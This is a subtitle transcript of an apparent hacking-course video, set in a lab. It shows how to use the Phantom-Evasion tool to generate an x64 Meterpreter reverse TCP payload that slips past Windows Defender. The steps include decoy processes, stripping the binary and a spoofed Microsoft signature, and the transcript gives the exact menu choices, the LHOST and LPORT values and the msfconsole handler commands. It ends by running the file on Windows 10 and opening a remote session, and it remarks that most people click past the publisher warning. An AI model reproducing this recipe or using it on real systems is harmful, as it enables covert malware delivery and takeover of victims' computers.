1
00:00:00,330 --> 00:00:06,040
msfvenom is a really good tool when you're trying to generate payloads.

2
00:00:06,630 --> 00:00:11,920
It has a whole lot of features that allow you to play with many things in payloads.

3
00:00:12,540 --> 00:00:19,170
However, antivirus software companies constantly update their databases and detection mechanisms.

4
00:00:19,630 --> 00:00:25,560
As I said before, they can use artificial intelligence and machine learning, cloud computing and many

5
00:00:25,560 --> 00:00:30,660
other technologies to improve their products, because they're trying to sell them and make a profit.

6
00:00:31,110 --> 00:00:36,140
So that means msfvenom payloads are pretty much always detected.

7
00:00:36,150 --> 00:00:43,020
I'd say, you know, 85 percent of the time, mostly, they're detected by these improved technologies.

8
00:00:43,920 --> 00:00:45,390
But I want to show you something.

9
00:00:46,510 --> 00:00:47,980
So open Windows 10.

10
00:00:48,960 --> 00:00:56,310
And go to http://10.10.2.11:8000

11
00:00:57,280 --> 00:01:04,300
to view our malware folder from a browser. Now, the three files that we created in the previous videos

12
00:01:04,300 --> 00:01:12,430
are here, so let's download them in order. Click on normal.exe and save. Well, Windows

13
00:01:12,430 --> 00:01:15,490
Defender detects it as a virus.

14
00:01:16,540 --> 00:01:20,600
It detects it even when I download it, not when I launch it.

15
00:01:21,130 --> 00:01:22,610
See, that's a big improvement.

16
00:01:23,920 --> 00:01:29,770
So the next file: download encoded.exe and save.

17
00:01:29,950 --> 00:01:36,640
As you can see, while downloading, Defender scans the file. OK, that's detected as well. Let's have a look

18
00:01:36,640 --> 00:01:41,440
at the third file. Click it to download and save. Defender is also scanning the file.

19
00:01:42,120 --> 00:01:45,880
OK, unfortunately it's also detected as a virus.
20
00:01:47,040 --> 00:01:48,630
So then let's go back to Kali.

21
00:01:50,220 --> 00:01:51,800
What do you think we should do at the moment?

22
00:01:52,620 --> 00:01:59,360
So the point I'm trying to make here is that antivirus software and payload generators are in competition.

23
00:02:00,000 --> 00:02:06,810
So today your payload can successfully execute on your targets and you can evade the antivirus software.

24
00:02:07,080 --> 00:02:14,750
But a few days go by and the same payload may be prevented from executing and detected as malware.

25
00:02:15,300 --> 00:02:18,660
So then you need to find a new custom payload generator.

26
00:02:19,720 --> 00:02:28,480
So at the time I record this course, I'm looking for a custom payload generator and I found one on GitHub,

27
00:02:29,200 --> 00:02:31,960
and you can use this one or find another one for yourself.

28
00:02:32,710 --> 00:02:33,300
All righty, then.

29
00:02:33,790 --> 00:02:38,230
Let me show you first how to install this custom generator.

30
00:02:38,980 --> 00:02:42,730
So I'm going to use another Kali instance for a fresh install.

31
00:02:43,540 --> 00:02:47,440
So open up your browser and go to this GitHub address.

32
00:02:48,160 --> 00:02:51,760
Phantom-Evasion is the name of this payload generator.

33
00:02:53,140 --> 00:02:55,240
So I'll download it as a zip file.

34
00:02:58,620 --> 00:03:00,510
Then open the file explorer and

35
00:03:01,520 --> 00:03:02,990
go to the download directory.

36
00:03:04,290 --> 00:03:05,040
And unzip it.

37
00:03:07,420 --> 00:03:13,730
And you can cut or copy the extracted folder to the [unclear] folder on the desktop.

38
00:03:14,410 --> 00:03:17,740
So here are the files in the Phantom folder.

39
00:03:18,310 --> 00:03:20,230
Close it up and open your terminal.

40
00:03:21,550 --> 00:03:25,510
So change the directory to the Phantom folder, like this.

41
00:03:26,770 --> 00:03:38,350
Then type chmod +x phantom-evasion.py to make the file runnable by the current user, and

42
00:03:38,350 --> 00:03:45,030
then type python phantom-evasion.py to start the installation.

43
00:03:46,110 --> 00:03:53,130
So the installation will take a really long time, but be patient, and as always, I'm not going to record

44
00:03:53,130 --> 00:03:54,060
the whole installation.

45
00:03:54,070 --> 00:03:54,920
You just wait for it.

46
00:03:56,030 --> 00:04:02,390
And we're back. After the installation, you will have this screen, which means you installed it perfectly.

47
00:04:02,820 --> 00:04:04,130
Now I'm going to go back to my Kali.

48
00:04:05,270 --> 00:04:07,910
And go to the Phantom folder.

49
00:04:08,860 --> 00:04:10,120
Then run

50
00:04:11,250 --> 00:04:15,570
python phantom-evasion.py.

51
00:04:19,240 --> 00:04:26,050
Now you can explore all the modules. There are many, many very useful ones, but what I'm looking for is

52
00:04:26,080 --> 00:04:32,350
a stealthy Windows payload, so type 1, and it will be stagers.

53
00:04:32,350 --> 00:04:33,400
So type 2.

54
00:04:34,290 --> 00:04:39,450
The Windows 10 box is 64-bit, so type 2.

55
00:04:41,770 --> 00:04:48,100
And then these are the payloads that Phantom-Evasion provides for it, so I'm going to choose the fourth

56
00:04:48,100 --> 00:04:48,400
one.

57
00:04:49,700 --> 00:04:52,760
It's x64 Meterpreter reverse TCP.

58
00:04:54,080 --> 00:04:57,350
So this has a short but informative warning.

59
00:04:58,220 --> 00:05:03,740
And it also shows the required payload for the handler, so I'll press Enter to continue.

60
00:05:04,730 --> 00:05:08,900
Provide the host, which is 10.10.2.11.

61
00:05:09,760 --> 00:05:11,650
LPORT is 443.

62
00:05:12,820 --> 00:05:17,070
Then the file name: phantom, I think, is a good name.

63
00:05:18,390 --> 00:05:23,230
Now it's good to add multiple process behaviors, so type Y.

64
00:05:24,220 --> 00:05:27,640
Insert two decoy processes.
65
00:05:28,740 --> 00:05:32,580
And stripping the executable will also help, so type Y.

66
00:05:34,540 --> 00:05:37,360
It will sign the executable if you want.

67
00:05:37,390 --> 00:05:38,260
So, yeah, I do.

68
00:05:38,620 --> 00:05:39,460
So type Y.

69
00:05:41,140 --> 00:05:47,020
So it'll spoof a Microsoft cert and fill it with [unclear] information.

70
00:05:48,920 --> 00:05:52,040
And then finally, the payload is generated, so

71
00:05:53,060 --> 00:05:58,850
the file is in the Phantom-Evasion directory. Open up a new tab and ls.

72
00:06:00,150 --> 00:06:05,430
And as you're looking at what I'm looking at, you will see that phantom.exe is right here.

73
00:06:06,340 --> 00:06:12,490
All right, move phantom.exe to /root/Desktop/malware.

74
00:06:13,970 --> 00:06:21,020
So I moved it here because I already have the Python server running from this folder. So now I'll go to the

75
00:06:21,020 --> 00:06:28,480
msfconsole, set payload to windows/x64/meterpreter/reverse_tcp,

76
00:06:30,780 --> 00:06:34,710
set LHOST to 10.10.2.11,

77
00:06:35,760 --> 00:06:38,760
and set LPORT to 443.

78
00:06:40,350 --> 00:06:44,090
Then options, to check and make sure everything's OK.

79
00:06:45,220 --> 00:06:47,800
And if there's no problem, then exploit -j.

80
00:06:49,950 --> 00:06:57,720
OK, so now open Windows 10 and open the download page for our executables. Refresh the page.

81
00:06:58,660 --> 00:07:02,470
Now download phantom.exe and save it.

82
00:07:04,430 --> 00:07:07,310
Windows Defender is scanning the file.

83
00:07:08,310 --> 00:07:12,600
And just like that, it does not detect anything.

84
00:07:13,590 --> 00:07:15,210
So now open the download folder.

85
00:07:16,400 --> 00:07:19,130
And double-click the file to launch it.

86
00:07:21,380 --> 00:07:24,950
Now, you might think you are detected, but no.
87
00:07:26,160 --> 00:07:32,250
Click "More info" and you'll see why: because Microsoft doesn't know the publisher of this executable.

88
00:07:33,140 --> 00:07:39,650
So it just warns us, which nobody really cares about, because, you know, it warns even for very well

89
00:07:39,650 --> 00:07:42,530
known applications, so you can run it anyway.

90
00:07:42,590 --> 00:07:43,340
Most people do.

91
00:07:44,360 --> 00:07:48,230
Then go to Kali and open the msfconsole tab.

92
00:07:49,690 --> 00:07:56,410
So here's a tip: because you used the decoy processes and some other techniques applied to the payload

93
00:07:56,410 --> 00:08:01,990
as well, it's going to connect back, but it's going to take a bit, so just wait for it.

94
00:08:02,740 --> 00:08:04,480
Believe me, the session will open.

95
00:08:06,440 --> 00:08:08,010
OK, it didn't prove me wrong.

96
00:08:08,150 --> 00:08:10,070
There it is, the session has opened.

97
00:08:11,400 --> 00:08:13,410
Hit Enter and type sessions.

98
00:08:14,720 --> 00:08:16,790
So now you can interact with session 8.

99
00:08:18,940 --> 00:08:20,680
Type getuid.

100
00:08:21,900 --> 00:08:22,890
sysinfo.

101
00:08:23,840 --> 00:08:30,980
And congratulations, you have now evaded Windows Defender on Windows 10 and got a Meterpreter

102
00:08:30,980 --> 00:08:31,460
session.

103
00:08:32,560 --> 00:08:33,250
Well done.